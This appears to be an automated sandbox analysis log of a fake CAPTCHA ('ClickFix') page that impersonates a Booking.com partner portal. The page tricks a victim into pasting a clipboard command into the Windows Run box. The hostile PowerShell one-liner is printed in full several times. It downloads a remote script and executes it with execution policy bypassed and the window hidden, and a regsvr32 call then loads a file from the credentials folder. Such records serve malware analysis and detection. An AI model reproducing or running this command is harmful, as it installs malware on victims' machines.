Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -nop -w h -ep bypass -c "Start-BitsTransfer ('h'+'t'+'t'+'ps://files.catbox.moe/cj06ld.txt') ($env:TEMP+'y.ps1'); &($env:TEMP+'y.ps1')" ;$__cfCheck="Click OK to complete verification"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\regsvr32.exe "C:\Windows\system32\regsvr32.exe" /s /i:svc C:\Users\user\AppData\Roaming\Microsoft\Credentials\7Orchid.p12
Source: unknown	Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\regsvr32.exe "C:\Windows\system32\regsvr32.exe" /s /i:svc C:\Users\user\AppData\Roaming\Microsoft\Credentials\7Orchid.p12
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown

Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdataengine.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bitsproxy.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: aclayers.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc_os.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: uxtheme.dll

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Data Obfuscation

Source: unknown

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -nop -w h -ep bypass -c "Start-BitsTransfer ('h'+'t'+'t'+'ps://files.catbox.moe/cj06ld.txt') ($env:TEMP+'y.ps1'); &($env:TEMP+'y.ps1')" ;$__cfCheck="Click OK to complete verification"

Persistence and Installation Behavior

Source: screenshot	OCR Text: -8 x about:blank Booking.cam - Partner Hub X confirm -id2719.click Robot or human ? Check the box to confllm that you're human. Thank You! I'm not a robot Priva:y - Terme Verification Steps 1. Press Windows Button C 2. Press CTRL + V 3. Press Enter 09:20 ENG p Type here to search SG 29/05/2025
Source: screenshot	OCR Text: -8 about:blank Booking.cam - Partner Hub X confirm -id2719.click Robot or human ? Check the box to confllm that you're human. Thank You! I'm not a robot Priva:y - Terme Verification Steps 1. Press Windows Button C 2. Press CTRL + V 3. Press Enter x Run Type the name of a program, folder, document or Internet resource, and Windows will open It for you. '.psl I)" 0K to complete verification" v Open: 0K 09:20 ENG p Type here to search SG 29/05/2025
Source: screenshot	OCR Text: -8 about:blank Booking.cam - Partner Hub X confirm -id2719.click Robot or human ? Check the box to confllm that you're human. Thank You! I'm not a robot Priva:y - Terme Verification Steps 1. Press Windows Button C 2. Press CTRL + V 3. Press Enter x Run Type the name of a program, folder, document or Internet resource, and Windows will open It for you. nsfer ('h'+'t'+'t'+'ps://files.catbox.moe/cj061d.txt') (Senv v Open: 0K 09:20 ENG p Type here to search SG 29/05/2025
Source: screenshot	OCR Text: e about:blank -8 Booking.cam - Partner Hub X confirm -id2719.click Robot or human ? Check the box to confllm that you're human. Thank You! I'm not a robot Priva:y - Terme Verification Steps 1. Press Windows Button C Undo 2. Press CTRL + V Cut 3. Press Enter Copy Paste Delete Select All Right to left Reading order Run Show Unicode control characters Insert Unicode control character Type the nam resource, and open IME Reconversion Open: 09:20 ENG p Type here to search SG 29/05/2025
Source: screenshot	OCR Text: e about:blank -8 Booking.cam - Partner Hub X confirm -id2719.click Robot or human ? Check the box to confllm that you're human. Thank You! I'm not a robot Priva:y - Terme Verification Steps 1. Press Windows Button C 2. Press CTRL + V 3. Press Enter x Run Type the name of a program, folder, document or Internet resource, and Windows will open It for you. shell -nop h -e b ass -c "Stat-BitsTransfer Open: 09:20 ENG p Type here to search SG 29/05/2025
Source: Chrome DOM: 0.2	OCR Text: Robot or human ? Check the box to confllm that you're human. Thank You! I'm not a robot Privacy - 'Tenn.: Verification Steps 1. Press Windows Button 'C 2. Press CTRL + V 3. Press Enter
Source: screenshot	OCR Text: -8 about:blank Booking.cam - Partner Hub X confirm -id2719.click Robot or human ? Check the box to confllm that you're human. Thank You! c I'm not a robot Priva:y - Terme Verification Steps 1. Press Windows Button C 2. Press CTRL + V 3. Press Enter x Run nl>l Type the e of a program, folder, document or Internet resource, and Windows will open It for you. Open: 09:20 ENG p Type here to search SG 29/05/2025
Source: screenshot	OCR Text: -8 x about:blank Booking.cam - Partner Hub X confirm -id2719.click Robot or human ? Check the box to confllm that you're human. Thank You! c I'm not a robot Priva:y - Terme Verification Steps 1. Press Windows Button C 2. Press CTRL + V 3. Press Enter 09:20 ENG p Type here to search SG 29/05/2025

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

Clipboard modification: powershell -nop -w h -ep bypass -c "Start-BitsTransfer ('h'+'t'+'t'+'ps://files.catbox.moe/cj06ld.txt') ($env:TEMP+'y.ps1'); &($env:TEMP+'y.ps1')" ;$__cfCheck="Click OK to complete verification"

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Section loaded: \KnownDlls\BitsProxy.dll

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
